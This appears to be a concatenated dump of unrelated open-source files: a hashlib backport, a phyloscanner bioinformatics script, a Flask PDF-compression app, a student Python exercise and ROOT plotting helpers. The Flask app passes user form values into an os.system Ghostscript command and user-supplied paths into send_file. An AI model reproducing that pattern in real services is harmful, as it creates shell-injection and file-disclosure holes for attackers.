return '%s_%s' % (self.ToPpapiType(enum_type).upper(),
enum_value.name.upper())
def _ResolveType(self, type_):
if type_.property_type == model.PropertyType.REF:
return self._ResolveType(self._namespace.types[type_.ref_type])
if type_.property_type == model.PropertyType.ARRAY:
return self._ResolveType(type_.item_type)
return type_
def _IsOrContainsArray(self, type_):
if type_.property_type == model.PropertyType.ARRAY:
return True
type_ = self._ResolveType(type_)
if type_.property_type == model.PropertyType.OBJECT:
return any(self._IsOrContainsArray(param.type_)
for param in type_.properties.itervalues())
return False
def HasArrayOuts(self, function):
"""Returns True if the function produces any arrays as outputs.
This includes arrays that are properties of other objects.
"""
if function.callback:
for param in function.callback.params:
if self._IsOrContainsArray(param.type_):
return True
return function.returns and self._IsOrContainsArray(function.returns)
class _IdlGenerator(_PpapiGeneratorBase):
TEMPLATE_NAME = 'idl'
class _GeneratorWrapper(object):
def __init__(self, generator_factory):
self._generator_factory = generator_factory
def Generate(self, namespace):
return self._generator_factory(namespace).Generate()
class PpapiGenerator(object):
def __init__(self):
self.idl_generator = _GeneratorWrapper(_IdlGenerator)
| bsd-3-clause |
openhealthcare/openspirometer | lib/python2.7/site-packages/setuptools/_backport/hashlib/__init__.py | 77 | 5011 | # $Id$
#
# Copyright (C) 2005 Gregory P. Smith (greg@krypto.org)
# Licensed to PSF under a Contributor Agreement.
#
__doc__ = """hashlib module - A common interface to many hash functions.
new(name, string='') - returns a new hash object implementing the
given hash function; initializing the hash
using the given string data.
Named constructor functions are also available, these are much faster
than using new():
md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
More algorithms may be available on your platform but the above are
guaranteed to exist.
NOTE: If you want the adler32 or crc32 hash functions they are available in
the zlib module.
Choose your hash function wisely. Some have known collision weaknesses.
sha384 and sha512 will be slow on 32 bit platforms.
Hash objects have these methods:
- update(arg): Update the hash object with the string arg. Repeated calls
are equivalent to a single call with the concatenation of all
the arguments.
- digest(): Return the digest of the strings passed to the update() method
so far. This may contain non-ASCII characters, including
NUL bytes.
- hexdigest(): Like digest() except the digest is returned as a string of
double length, containing only hexadecimal digits.
- copy(): Return a copy (clone) of the hash object. This can be used to
efficiently compute the digests of strings that share a common
initial substring.
For example, to obtain the digest of the string 'Nobody inspects the
spammish repetition':
>>> import hashlib
>>> m = hashlib.md5()
>>> m.update("Nobody inspects")
>>> m.update(" the spammish repetition")
>>> m.digest()
'\\xbbd\\x9c\\x83\\xdd\\x1e\\xa5\\xc9\\xd9\\xde\\xc9\\xa1\\x8d\\xf0\\xff\\xe9'
More condensed:
>>> hashlib.sha224("Nobody inspects the spammish repetition").hexdigest()
'a4337bc45a8fc544c03f52dc550cd6e1e87021bc896588bd79e901e2'
"""
# This tuple and __get_builtin_constructor() must be modified if a new
# always available algorithm is added.
__always_supported = ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')
algorithms = __always_supported
__all__ = __always_supported + ('new', 'algorithms')
def __get_builtin_constructor(name):
try:
if name in ('SHA1', 'sha1'):
import _sha
return _sha.new
elif name in ('MD5', 'md5'):
import md5
return md5.new
elif name in ('SHA256', 'sha256', 'SHA224', 'sha224'):
import _sha256
bs = name[3:]
if bs == '256':
return _sha256.sha256
elif bs == '224':
return _sha256.sha224
elif name in ('SHA512', 'sha512', 'SHA384', 'sha384'):
import _sha512
bs = name[3:]
if bs == '512':
return _sha512.sha512
elif bs == '384':
return _sha512.sha384
except ImportError:
pass # no extension module, this hash is unsupported.
raise ValueError('unsupported hash type %s' % name)
def __get_openssl_constructor(name):
try:
f = getattr(_hashlib, 'openssl_' + name)
# Allow the C module to raise ValueError. The function will be
# defined but the hash not actually available thanks to OpenSSL.
f()
# Use the C function directly (very fast)
return f
except (AttributeError, ValueError):
return __get_builtin_constructor(name)
def __py_new(name, string=''):
"""new(name, string='') - Return a new hashing object using the named algorithm;
optionally initialized with a string.
"""
return __get_builtin_constructor(name)(string)
def __hash_new(name, string=''):
"""new(name, string='') - Return a new hashing object using the named algorithm;
optionally initialized with a string.
"""
try:
return _hashlib.new(name, string)
except ValueError:
# If the _hashlib module (OpenSSL) doesn't support the named
# hash, try using our builtin implementations.
# This allows for SHA224/256 and SHA384/512 support even though
# the OpenSSL library prior to 0.9.8 doesn't provide them.
return __get_builtin_constructor(name)(string)
try:
import _hashlib
new = __hash_new
__get_hash = __get_openssl_constructor
except ImportError:
new = __py_new
__get_hash = __get_builtin_constructor
for __func_name in __always_supported:
# try them all, some may not work due to the OpenSSL
# version not supporting that algorithm.
try:
globals()[__func_name] = __get_hash(__func_name)
except ValueError:
import logging
logging.exception('code for hash %s was not found.', __func_name)
# Cleanup locals()
del __always_supported, __func_name, __get_hash
del __py_new, __hash_new, __get_openssl_constructor
| agpl-3.0 |
BDI-pathogens/phyloscanner | tools/EstimateReadCountPerWindow.py | 1 | 14576 | #!/usr/bin/env python
from __future__ import print_function
## Author: Chris Wymant, c.wymant@imperial.ac.uk
## Acknowledgement: I wrote this while funded by ERC Advanced Grant PBDR-339251
##
## Overview:
ExplanatoryMessage = '''For each bam file in the list given as input, this
script does the following. The distribution of read lengths, and insert sizes if
reads are found to be paired, is calculated. (Here, length means length of the
mapping reference covered by the read, which will not be the same as the true
read length if there are insertions or deletions.) We then estimate the number
of reads and inserts expected to fully span a window of width W by assuming that
reads are distributed randomly over the genome (i.e. ignoring the actual
location information in the bam). We output this count for each bam file as a
function of W.'''
import os
import sys
import argparse
import pysam
import phyloscanner_funcs as pf
import collections
import numpy as np
# Define a function to check files exist, as a type for the argparse.
def File(MyFile):
if not os.path.isfile(MyFile):
raise argparse.ArgumentTypeError(MyFile+' does not exist or is not a file.')
return MyFile
# A class to have new lines in argument help text
class SmartFormatter(argparse.HelpFormatter):
def _split_lines(self, text, width):
if text.startswith('R|'):
return text[2:].splitlines()
return argparse.HelpFormatter._split_lines(self, text, width)
# Set up the arguments for this script
parser = argparse.ArgumentParser(description=ExplanatoryMessage,
formatter_class=SmartFormatter)
# Positional args
parser.add_argument('BamAndRefList', type=File,
help='''R|A csv-format file listing the bam and reference files
(i.e. the fasta-format file containing the sequence to
which the reads were mapped). The first column should
be the bam file, the second column the corresponding
reference file, with a comma separating the two. An
optional third column, if present, will be used to
rename the bam files in all output. For example:
PatientA.bam,PatientA_ref.fasta,A
PatientB.bam,PatientB_ref.fasta,B''')
parser.add_argument('-N', '--normalise', action='store_true', help='''Normalise
the counts for each bam to the value at a window width of zero, making it easier
to compare the relative decline in number of reads with growing window size
between different bams with different total numbers of reads.''')
parser.add_argument('-O', '--out-filename', help="We'll append '.csv' for the "
"output data file, and '.pdf' for the plot. The default is "
"'EstimatedReadCountsPerWindow'.", default='EstimatedReadCountsPerWindow')
parser.add_argument('-OIS', '--overlapping-insert-sizes', action='store_true',
help='''Just record the insert size distribution for each bam, restricted to
inserts where the mates overlap.''')
parser.add_argument('-DB', '--dont-plot', action='store_true',
help="Don't plot the results.")
parser.add_argument('-MC', '--min-read-count', type=float, help='''Used to
specify a positive number: we'll truncate the x axis when the window width
becomes so large that all bams have a read count per window below this
value. The default is 1.''', default=1)
parser.add_argument('-AS', '--axis-font-size', type=int,
help='For the plot. The default is 15.', default=15)
parser.add_argument('-TS', '--title-font-size', type=int,
help='For the plot. The default is 15.', default=15)
parser.add_argument('-LS', '--legend-font-size', type=int,
help='For the plot. The default is 7.', default=7)
parser.add_argument('-LL', '--legend-location',
help='''For the plot. The default is 'lower left'. The other options are:
'best', 'upper right', 'upper left', 'lower right', 'right', 'center left',
'center right', 'lower center',' upper center', 'center' ''',
default='lower left')
parser.add_argument('-LY', '--linear-y-axis',
help='For the plot. The default is logarithmic.', action='store_true')
parser.add_argument('-XM', '--x-min-max', help='The minimum and maximum for '\
'the x axis in the plot, specified together as a comma-separated pair of '\
'numbers.')
parser.add_argument('-YM', '--y-min-max', help='The minimum and maximum for '\
'the y axis in the plot, specified together as a comma-separated pair of '\
'numbers.')
parser.add_argument('--x-samtools', default='samtools', help=\
'Used to specify the command required to run samtools, if it is needed to index'
' the bam files (by default: samtools).')
args = parser.parse_args()
InsertSizesOnly = args.overlapping_insert_sizes
def GetIntPair(arg, ArgName):
MinMax = arg.split(',')
if len(MinMax) != 2:
print(ArgName, 'should be used to specify a comma-separated pair of',
'numbers. Quitting.', file=sys.stderr)
exit(1)
try:
Min = float(MinMax[0])
Max = float(MinMax[1])
except ValueError:
print(ArgName, 'should be used to specify a comma-separated pair of',
'numbers. Quitting.', file=sys.stderr)
exit(1)
return min(Min, Max), max(Min, Max)
# Get plot limits
if args.x_min_max:
Xmin, Xmax = GetIntPair(args.x_min_max, '--x-min-max')
if args.y_min_max:
Ymin, Ymax = GetIntPair(args.y_min_max, '--y-min-max')
# Read in the input bam and ref files
BamFiles, RefFiles, aliases, BamFileBasenames = \
pf.ReadInputCSVfile(args.BamAndRefList)
NumBams = len(BamFiles)
# Make index files for the bam files if needed.
pf.MakeBamIndices(BamFiles, args.x_samtools)
def FindReadCountAsFuncOfWindowWidth(ReadSizeCountDict, RefLength):
# Return an empty array if there are no reads
if len(ReadSizeCountDict) == 0:
return np.zeros(0)
LargestReadLength = max(ReadSizeCountDict.keys())
RefLengthPlus1 = RefLength + 1
# The nth element of this list will eventually contain the number of reads
# expected to span a window of width n+1 (list is zero-based).
ReadsCountByWindowWidth = np.zeros(LargestReadLength)
for ReadLength, count in ReadSizeCountDict.items():
ReadLengthPlus1 = ReadLength + 1
# The number of positions at which we could place a window of width W is
# RefLength - W + 1
# The number of positions at which we could place a window of width W such
# that it is wholly inside a read is ReadLength - W + 1
# Probability of a given read overlapping a window of width W is therefore
# (ReadLength - W + 1) / (RefLength - W + 1)
for W in range(1, ReadLengthPlus1):
NumSpanningReads = count * \
float(ReadLengthPlus1 - W) / (RefLengthPlus1 - W)
ReadsCountByWindowWidth[W-1] += NumSpanningReads
if args.normalise:
ReadsCountByWindowWidth = [float(count) / ReadsCountByWindowWidth[0] \
for count in ReadsCountByWindowWidth]
return ReadsCountByWindowWidth
ReadLengthCountsByBam = collections.OrderedDict()
InsertSizeCountsByBam = collections.OrderedDict()
InsertSizesOnlyByBam = collections.OrderedDict()
for i, BamFileName in enumerate(BamFiles):
alias = aliases[i]
print('Now counting read and insert sizes for', alias)
bam = pysam.AlignmentFile(BamFileName, "rb")
# Find the reference in the bam file; there should only be one.
AllRefs = bam.references
if len(AllRefs) != 1:
print('Expected exactly one reference in', BamFileName + '; found',\
str(len(AllRefs)) + '.Quitting.', file=sys.stderr)
exit(1)
RefName = AllRefs[0]
# Get the length of the reference.
AllRefLengths = bam.lengths
if len(AllRefLengths) != 1:
print('Pysam error: found one reference but', len(AllRefLengths),
'reference lengths. Quitting.', file=sys.stderr)
exit(1)
RefLength = AllRefLengths[0]
PairedReadCoords = {}
ReadLengthCounts = {}
InsertSizeCounts = {}
TotalReadCount = 0
# Iterate through the reads
for read in bam.fetch(RefName):
MappedPositions = read.get_reference_positions(full_length=False)
# Skip unmapped reads
if not MappedPositions:
continue
TotalReadCount += 1
start = min(MappedPositions[0], MappedPositions[-1])
end = max(MappedPositions[0], MappedPositions[-1])
ReadLength = end - start
try:
ReadLengthCounts[ReadLength] += 1
except KeyError:
ReadLengthCounts[ReadLength] = 1
# The first time we encounter a mate from a pair, record its start and end.
# When we encounter its mate, if they overlap, record the insert size; if
# they don't overlap, record their separate lengths as though they are two
# different inserts (because phyloscanner won't merge them - they are
# effectively two separate inserts from the point of view of merging).
if read.is_paired:
if read.query_name in PairedReadCoords:
MateStart, MateEnd, MateFoundBool = PairedReadCoords[read.query_name]
PairedReadCoords[read.query_name][2] = True
if start <= MateStart <= end:
InsertSize = max(end, MateEnd) - start
try:
InsertSizeCounts[InsertSize] += 1
except KeyError:
InsertSizeCounts[InsertSize] = 1
elif MateStart <= start <= MateEnd:
InsertSize = max(end, MateEnd) - MateStart
try:
InsertSizeCounts[InsertSize] += 1
except KeyError:
InsertSizeCounts[InsertSize] = 1
else:
try:
InsertSizeCounts[ReadLength] += 1
except KeyError:
InsertSizeCounts[ReadLength] = 1
MateLength = MateEnd - MateStart
try:
InsertSizeCounts[MateLength] += 1
except KeyError:
InsertSizeCounts[MateLength] = 1
else:
PairedReadCoords[read.query_name] = [start, end, False]
# For paired reads for which we didn't find a mate, add just the read length
# to the insert size distribution.
NumMissingMates = 0
for start, end, MateFound in PairedReadCoords.values():
if not MateFound:
NumMissingMates += 1
ReadLength = end - start
try:
InsertSizeCounts[ReadLength] += 1
except KeyError:
InsertSizeCounts[ReadLength] = 1
if NumMissingMates > 0:
print('Info:', NumMissingMates, 'of', TotalReadCount, 'reads in',
BamFileName, "are flagged as being paired but don't have a mate present.")
# Skip empty bams
if TotalReadCount == 0:
print('Warning: no reads found in', BamFileName + '. Skipping.')
continue
if InsertSizesOnly:
InsertSizesOnlyByBam[alias] = InsertSizeCounts
ReadLengthCountsByBam[alias] = \
FindReadCountAsFuncOfWindowWidth(ReadLengthCounts, RefLength)
InsertSizeCountsByBam[alias] = \
FindReadCountAsFuncOfWindowWidth(InsertSizeCounts, RefLength)
if InsertSizesOnly:
with open(args.out_filename + '.csv', 'w') as f:
f.write('Bam file,Size of overlapping read pair or length of read in ' + \
'non-overlapping pair,Count\n')
for alias, InsertSizesOnly in InsertSizesOnlyByBam.items():
for size, count in sorted(InsertSizesOnly.items(), key=lambda x:x[0]):
f.write(alias + ',' + str(size) + ',' + str(count) + '\n')
exit(0)
# Make a matrix for which the first column is every window size we need to
# consider, in order, and subsequent columns list the number of reads (and
# inserts, if reads are paired) expected to fully span a window of that size,
# for each different bam.
MaxInsertSize = max(len(list_) for list_ in InsertSizeCountsByBam.values())
SomeDataIsPaired = MaxInsertSize > 0
MaxReadOrInsertSize = max(MaxInsertSize,
max(len(list_) for list_ in ReadLengthCountsByBam.values()))
if SomeDataIsPaired:
matrix = np.zeros((MaxReadOrInsertSize, 2 * NumBams + 1))
else:
matrix = np.zeros((MaxReadOrInsertSize, NumBams + 1))
matrix[:, 0] = np.arange(1, MaxReadOrInsertSize + 1)
header = 'window width'
if SomeDataIsPaired:
for alias in aliases:
header += ',' + 'read count in ' + alias + ',insert size count in ' + alias
for i, ReadLengthCounts in enumerate(ReadLengthCountsByBam.values()):
matrix[:len(ReadLengthCounts), 2 * i + 1] = ReadLengthCounts
for i, InsertSizeCounts in enumerate(InsertSizeCountsByBam.values()):
matrix[:len(InsertSizeCounts), 2 * i + 2] = InsertSizeCounts
else:
for alias in aliases:
header += ',' + 'read count in ' + alias
for i, ReadLengthCounts in enumerate(ReadLengthCountsByBam.values()):
matrix[:len(ReadLengthCounts), i + 1] = ReadLengthCounts
# Write the matrix to a csv file.
with open(args.out_filename + '.csv', 'w') as f:
np.savetxt(f, matrix, delimiter=',', header=header, fmt='%.1f')
if args.dont_plot:
exit(0)
try:
import matplotlib.pyplot as plt
except ImportError:
print("The python library matplotlib does not seem to be installed: you'll "
"need to plot", args.out_filename + '.csv yourself.' )
exit(1)
# For plotting: cut off the tail end of the matrix where read counts are too
# small.
LastDesiredRow = 0
for row in range(MaxReadOrInsertSize - 1, -1, -1):
if max(matrix[row, 1:]) >= args.min_read_count:
LastDesiredRow = row
break
if LastDesiredRow == 0:
print('Warning: no bam has', args.min_read_count, 'reads per window',
'regardless how small the window is. Ignoring the --min-read-count value.')
LastDesiredRow = MaxReadOrInsertSize - 1
matrix = matrix[:LastDesiredRow + 1, :]
ax = plt.figure().add_subplot(111)
if args.x_min_max:
ax.set_xlim(xmin=Xmin, xmax=Xmax)
if args.y_min_max:
ax.set_ylim(ymin=Ymin, ymax=Ymax)
for i in range(1, matrix.shape[1]):
if SomeDataIsPaired:
alias = aliases[(i - 1) / 2]
if i % 2 == 0:
label = 'read pairs, ' + alias
linestyle = '--'
else:
label = 'reads, ' + alias
linestyle = '-'
else:
label = aliases[i - 1]
linestyle = '-'
plt.plot(matrix[:, 0], matrix[:, i], label=label, linestyle=linestyle)
plt.xlabel('window width', fontsize=args.axis_font_size)
YaxisLabel = 'number of reads'
if args.normalise:
YaxisLabel += ' relative to\nwhen the window width of zero'
if SomeDataIsPaired:
title = \
'Estimating the number of unpaired reads and paired reads (merging\n' + \
'read in a pair when they overlap) spanning each window, assuming\n' + \
'reads are randomly distributed over the whole genome'
else:
title = \
'Estimating the number of reads spanning each window, assuming\n' + \
'they are randomly distributed over the whole genome'
plt.ylabel(YaxisLabel, fontsize=args.axis_font_size)
plt.title(title, fontsize=args.title_font_size)
ax.tick_params(axis='both', which='major', labelsize=args.axis_font_size)
if not args.linear_y_axis:
ax.set_yscale('log')
ax.set_xlim(xmin=0, xmax=LastDesiredRow)
plt.legend(loc=args.legend_location, fontsize=args.legend_font_size)
plt.tight_layout()
plt.savefig(args.out_filename + '.pdf')
| gpl-3.0 |
FreeCX/shakalator | main.py | 1 | 3902 | from flask import Flask, render_template, redirect, url_for
from flask import request, jsonify, send_file
from multiprocessing import Process, Pipe
from werkzeug import secure_filename
from os import path, system, remove
from hashlib import md5
import time
# 5m
TIME_DELTA = 5 * 60
""" инициализируем flask """
app = Flask(__name__, static_url_path='')
""" настраиваем папку для загрузки файлов """
app.config['UPLOAD_FOLDER'] = path.join(path.dirname(path.realpath(__file__)), 'upload')
def get_hash(text):
return md5(text.encode('utf-8')).hexdigest()
# главный поток обработки
def handler(conn):
clean_list = []
while True:
if conn.poll(10):
data = conn.recv()
sh_thread = Process(target=gs_shakalizing, args=data)
sh_thread.start()
sh_thread.join()
clean_list.append((data[1], time.clock_gettime(0)))
curr_time = time.clock_gettime(0)
new_list = []
for (filename, l_time) in clean_list:
delta = curr_time - l_time
if delta > TIME_DELTA:
gen_file = path.join(app.config['UPLOAD_FOLDER'], filename)
remove(gen_file)
else:
new_list.append((filename, l_time))
clean_list = new_list
# обрабатываем файл
def gs_shakalizing(filename, new_name, dpi):
old_file = path.join(app.config['UPLOAD_FOLDER'], filename)
new_file = path.join(app.config['UPLOAD_FOLDER'], new_name)
cmd = """/usr/bin/gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.5 -dPDFSETTINGS=/ebook -dNOPAUSE \
-dQUIET -dBATCH -dColorImageResolution={dpi} -sOutputFile='{output}' '{input}'\
""".format(dpi=dpi, output=new_file, input=old_file)
system(cmd)
remove(old_file)
# проверяем статус обработки
@app.route('/process', methods=['POST', 'GET'])
def process():
if request.method == 'POST':
if request.json:
filename = request.json.get('code')
file_path = path.join(app.config['UPLOAD_FOLDER'], filename)
if path.isfile(file_path):
return jsonify({"status": "founded"})
else:
return jsonify({"status": "not found"})
else:
return jsonify({"status": "error"})
else:
filename = request.values.get('code')
if filename:
file_path = path.join(app.config['UPLOAD_FOLDER'], filename)
return send_file(file_path, mimetype='application/pdf',
as_attachment=True, attachment_filename=filename + '.pdf')
else:
return 404
# загрузка файла и страница с ожиданием
@app.route('/shakalazing', methods=['POST', 'GET'])
def shakalazing():
if request.method == 'POST':
file = request.files['file']
if file:
filename = secure_filename(file.filename)
file.save(path.join(app.config['UPLOAD_FOLDER'], filename))
dpi = request.form.get('dpi')
hash_code = get_hash(filename + time.strftime('%H:%M:%S'))
parent_conn.send((filename, hash_code, dpi))
return redirect(url_for('shakalazing', code=hash_code))
else:
return redirect(url_for('index'))
else:
return render_template('shakalazing.html', code=request.values.get('code'))
# главная страница
@app.route('/')
def index():
return render_template('index.html')
if __name__ == '__main__':
parent_conn, child_conn = Pipe()
main_proc = Process(target=handler, args=(child_conn,))
main_proc.start()
app.run(host='0.0.0.0', port='5000')
main_proc.join()
| cc0-1.0 |
AnhellO/DAS_Sistemas | Ene-Jun-2020/garcia-morales-luis-fernando/1er Parcial/Primer Parcial/Ejercicio2.py | 1 | 1329 | import abc
from Ejercicio1 import Page
class PageComponent(metaclass=abc.ABCMeta):
@abc.abstractmethod
def ContenidoPagina():
pass
class TagOpen(PageComponent):
def ContenidoPagina(self):
return '<p'
class Estilo(PageComponent):
def __init__(self, style: PageComponent):
self.style = style
def ContenidoPagina(self):
return f'{self.style.ContenidoPagina()} style = "color:blue;">'
class TagClose(PageComponent):
def __init__(self, style: PageComponent):
self.style = style
def ContenidoPagina(self):
return f"{self.style.ContenidoPagina()} </p>"
class InsertarContenido(PageComponent):
def __init__(self, contenido):
self.contenidoPagina = contenido
def ContenidoPagina(self):
return f"{Estilo.ContenidoPagina()}{self.ContenidoPagina}</p>"
class main():
pagina1 = Page(
url="mail.google.com",
path="mail.google.com/mail/u/0/#inbox",
contenido="Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas.",
titulo="<h1>Gmail</h1>",
title="<title>Recibidos</title>",
metadesc="Correo Electrnico",
formato="html")
tagOpen = TagOpen()
estilo = Estilo(tagOpen)
print(InsertarContenido(pagina1.get_contenido()))
| mit |
aaniin/AliPhysics | PWGJE/EMCALJetTasks/Tracks/analysis/base/Graphics.py | 41 | 22080 | #**************************************************************************
#* Copyright(c) 1998-2014, ALICE Experiment at CERN, All rights reserved. *
#* *
#* Author: The ALICE Off-line Project. *
#* Contributors are mentioned in the code where appropriate. *
#* *
#* Permission to use, copy, modify and distribute this software and its *
#* documentation strictly for non-commercial purposes is hereby granted *
#* without fee, provided that the above copyright notice appears in all *
#* copies and that both the copyright notice and this permission notice *
#* appear in the supporting documentation. The authors make no claims *
#* about the suitability of this software for any purpose. It is *
#* provided "as is" without express or implied warranty. *
#**************************************************************************
"""
Graphics module, containing basic ROOT plot helper functionality and
base classes for specific kinds of plots
@author: Markus Fasel ,
@contact: <markus.fasel@cern.ch>
@organization: Lawrence Berkeley National Laboratory
@organization: ALICE Collaboration
@copyright: 1998-2014, ALICE Experiment at CERN, All rights reserved
"""
from ROOT import TCanvas,TH1F,TLegend,TPad,TPaveText,TF1, TGraph, TH1
from ROOT import kBlack
class Frame:
"""
Helper class handling frame drawing in plots
"""
def __init__(self, name, xmin, xmax, ymin, ymax):
"""
Construct frame with name and ranges for x and y coordinate
@param name: Name of the frame
@param xmin: Min. value of the x-coordinate
@param xmax: Max. value of the x-coordinate
@param ymin: Min. value of the y-coordinate
@param ymax: Max. value of the y-coordinate
"""
self.__framehist = TH1F(name, "", 100, xmin, xmax)
self.__framehist.SetStats(False)
self.__framehist.GetYaxis().SetRangeUser(ymin, ymax)
def SetXtitle(self, title):
"""
Set title of the x axis
@param title: Title of the x-axis
"""
self.__framehist.GetXaxis().SetTitle(title)
def SetYtitle(self, title):
"""
Set title of the y axis
@param title: Title of the y-axis
"""
self.__framehist.GetYaxis().SetTitle(title)
def Draw(self):
"""
Draw the frame.
"""
self.__framehist.Draw("axis")
class Style:
"""
Class for plot styles (currently only color and marker)
"""
def __init__(self, color, marker, options = None):
"""
Constructor
@param color: Color definition of the style
@param marker: Marker definition of the style
@param option: Optional other style definitions
"""
self.__color = color
self.__marker = marker
self.__linestyle = None
self.__linewidth = None
self.__fillstyle = None
self.__fillcolor = None
if options:
if "fillstyle" in options.keys():
self.__fillstyle = options["fillstyle"]
if "fillcolor" in options.keys():
self.__fillcolor = options["fillcolor"]
if "linestyle" in options.keys():
self.__linestyle = options["linestyle"]
if "linewidth" in options.keys():
self.__linewidth = options["linewidth"]
def SetColor(self, color):
"""
Change color of the graphics object
@param color: The color of the object
"""
self.__color = color
def SetMarker(self, marker):
"""
Change marker style of the graphics object
@param marker: The marker style
"""
self.__marker = marker
def SetLineStyle(self, linestyle):
"""
Change the line style
@param linestyle: New line style
"""
self.__linestyle = linestyle
def SetLineWidth(self, linewidth):
"""
Change the line width
@param linewidth: New line width
"""
self.__linewidth = linewidth
def SetFillStyle(self, fillstyle):
"""
Change the fill style
@param fillstyle: New fill style
"""
self.__fillstyle = fillstyle
def SetFillColor(self, fillcolor):
"""
Change the fill color
@param fillcolor: the new fill color
"""
self.__fillcolor = fillcolor
def GetColor(self):
"""
Access color of the graphics object
@return: Marker color
"""
return self.__color
def GetMarker(self):
"""
Access marker style
@return: Marker style
"""
return self.__marker
def GetLineStyle(self):
"""
Get the line style (if defined)
@return: The line style
"""
return self.__linestyle
def GetLineWidth(self):
"""
Get the line width
@return: The line width
"""
return self.__linewidth
def GetFillStyle(self):
"""
Get the fill style (if defined)
@return: The fill style
"""
return self.__fillstyle
def GetFillColor(self):
"""
Get the fill color (if defined)
@return: The fill color
"""
return self.__fillcolor
def DefineROOTPlotObject(self, rootobject):
"""
Sets the style to the root object
@param rootobject: The ROOT graphics object to be defined
"""
#print "Defining root object"
rootobject.SetMarkerColor(self.__color)
if self.__linestyle is not None:
rootobject.SetLineStyle(self.__linestyle)
if self.__linewidth is not None:
rootobject.SetLineWidth(self.__linewidth)
if not type(rootobject) is TF1:
rootobject.SetMarkerStyle(self.__marker)
rootobject.SetLineColor(self.__color)
if self.__fillstyle is not None:
rootobject.SetFillStyle(self.__fillstyle)
if self.__fillcolor is not None:
rootobject.SetFillColor(self.__fillcolor)
class GraphicsObject:
"""
Container for styled objects, inheriting from TGraph, TH1 or TF1
"""
def __init__(self, data, style = None, drawoption = "epsame"):
"""
Initialise new graphics object with underlying data (can be TH1 or TGraph(Errors)),
and optionally a plot style. If no plot style is provided, then the default style (black,
filled circles) is chosen.
@param data: Underlying data as root object
@param style: Plot style applied
@param drawoption: Draw option
"""
self.__data = data
mystyle = Style(kBlack, 20)
if style:
mystyle = style
self.SetStyle(mystyle)
self.__drawoption = "epsame"
if drawoption:
self.__drawoption = drawoption
if not "same" in self.__drawoption:
self.__drawoption += "same"
if type(self.__data) is TF1:
self.__drawoption = "lsame"
def SetStyle(self, style):
"""
Initialise underlying object with style
@param style: The plot style used
"""
style.DefineROOTPlotObject(self.__data)
def GetData(self):
"""
Provide access to underlying data
@return: The underlying root object
"""
return self.__data
def Draw(self):
"""
Draw graphics object. By default, the plot option is
"epsame". Option strings will always have the option same
"""
#print "Drawing option %s" %(self.__drawoption)
self.__data.Draw(self.__drawoption)
def AddToLegend(self, legend, title):
"""
Add graphics object to a legend provided from outside
@param legend: The legend the object is added to
@param title: Legend entry title
"""
option = "lep"
if type(self.__data) is TF1:
option = "l"
elif self.__IsBoxStyle(self.__data):
option = "f"
legend.AddEntry(self.__data, title, option)
def __IsBoxStyle(self, plotobject):
"""
Check whether plot object is drawn in a box style
@param plotobject: The object to check
@return: True if in box style, False otherwise
"""
if type(self.__data) is TF1:
return False
elif issubclass(type(self.__data), TGraph):
for i in range(2, 6):
if "%d" %(i) in self.__drawoption.lower():
return True
return False
elif issubclass(type(self.__data), TH1):
return True if "b" in self.__drawoption.lower() else False
class PlotBase:
"""
base class for plot objects
"""
class _FramedPad:
"""
Defining the pad structure inside the canvas. A pad has a frame with
axes definition, and optionally a legend and one or several label(s)
"""
class GraphicsEntry:
"""
Definition of a graphics entry
"""
def __init__(self, graphobject, title = None, addToLegend = False):
self.__object = graphobject
self.__title = title
self.__addToLegend = addToLegend
def __cmp__(self, other):
"""
Comparison is done accoring to the object title
@param other: object to compare with
@return: 0 if objects are equal, 1 if this object is larger, -1 if object is smaller
"""
# 1st case: either or both of the titles missing
if not self.__title and not other.GetTitle():
return None
if not self.__title and other.GetTitle():
return -1
if self.__title and not other.GetTitle():
return 1
# second case: both of the titles available
if self.__title == other.GetTitle():
return 0
if self.__title < other.GetTitle():
return -1
return 1
def GetObject(self):
"""
Accessor to graphics object
@return: Underlying object
"""
return self.__object
def GetTitle(self):
"""
Get the title of the object
@return: Title of the object
"""
return self.__title
def IsAddToLegend(self):
"""
Check whether graphics is foreseen to be added to legend
@return: True if the object is added to the legend
"""
return self.__addToLegend
def SetTitle(self, title):
"""
Change title of the graphics object
@param title: Title of the object
"""
self.__title = title
def SetAddToLegend(self, doAdd):
"""
Define whether object should be added to a legend
@param doAdd: Switch for adding object to a legend
"""
self.__addToLegend = doAdd
def __init__(self, pad):
"""
Constructor, creating a framed pad structure for a TPad
@param pad: Underlying ROOT pad
"""
self.__pad = pad
self.__Frame = None
self.__legend = None
self.__graphicsObjects = []
self.__labels = []
def DrawFrame(self, frame):
"""
Draw a frame, defined from outside, within the pad
The pad becomes owner of the frame
@param frame: Frame of the pad
"""
self.__frame = frame
self.__frame.Draw()
def DrawGraphicsObject(self, graphics, addToLegend = False, title = None):
"""
Draw a graphics object into the pad. If addToLegend is set, then the object is added to to the
legend.
"""
self.__graphicsObjects.append(self.GraphicsEntry(graphics, title, addToLegend))
graphics.Draw()
def DefineLegend(self, xmin, ymin, xmax, ymax):
"""
create a new legend within the frame with the
given boundary coordinates
@param xmin: Min. x value of the legend
@param xmin: Max. x value of the legend
@param xmin: Min. y value of the legend
@param xmin: Max. y value of the legend
"""
if not self.__legend:
self.__legend = TLegend(xmin, ymin, xmax, ymax)
self.__legend.SetBorderSize(0)
self.__legend.SetFillStyle(0)
self.__legend.SetTextFont(42)
def CreateLegend(self, xmin, ymin, xmax, ymax):
"""
Create Legend from all graphics entries
@param xmin: Min. x value of the legend
@param xmin: Max. x value of the legend
@param xmin: Min. y value of the legend
@param xmin: Max. y value of the legend
"""
if not self.__legend:
self.DefineLegend(xmin, ymin, xmax, ymax)
for entry in sorted(self.__graphicsObjects):
if entry.IsAddToLegend():
self.AddToLegend(entry.GetObject(), entry.GetTitle())
self.DrawLegend()
def GetLegend(self):
"""
Provide access to legend
@return: the legend
"""
return self.__legend
def AddToLegend(self, graphicsObject, title):
"""
Special method adding graphics objects to a legend
@param graphicsObject: graphics object to be added to the legend
@param title: Legend entry title
"""
if self.__legend:
graphicsObject.AddToLegend(self.__legend, title)
def DrawLegend(self):
"""
Draw the legend
"""
if self.__legend:
self.__legend.Draw()
def DrawLabel(self, xmin, ymin, xmax, ymax, text):
"""
Add a new label to the pad and draw it
@param xmin: Min. x value of the label
@param xmin: Max. x value of the label
@param xmin: Min. y value of the label
@param xmin: Max. y value of the label
@param text: Label text
"""
